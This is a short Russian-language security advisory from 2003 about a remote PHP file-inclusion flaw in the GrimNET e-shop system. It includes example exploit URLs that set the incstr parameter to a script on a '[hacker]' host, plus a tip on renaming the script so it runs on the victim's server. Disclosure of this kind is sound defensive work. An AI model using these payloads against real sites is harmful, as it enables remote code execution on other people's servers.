Выполнение произвольного PHP-кода в GrimNET e-shop

2003-10-22T00:00:00
ID SECURITYVULNS:DOC:5264
Type securityvulns
Reporter Securityvulns
Modified 2003-10-22T00:00:00

Description

Выполнение произвольного PHP-кода в GrimNET e-shop

Программа: GrimNET e-shop Опасность: высокая Наличие эксплоита: да.

Описание: Недавно была обнаружена уязвимость в корейской системе электронных магазинов GrimNET e-shop. Сценарии shop.html и notice.html включают (include) любой файл, указанный в переменной incstr без какой-бы то ни было проверки ее содержимого.

Пример/эксплоит: http://[victim]/shop.html?incstr=http://[hacker]/myfile.php http://[victim]/notice.html?incstr=http://[hacker]/myfile.php

Примечание: если на хосте http://[hacker]/ установлен php, то сценарию (в нашем случае myfile.php) надо дать иное расширение, например myfile.inc.

URL производителя: http://www.grimnet.net/

=== Обнаружил уязвимость: NivaX (nivax@web-hack.ru), www.web-hack.ru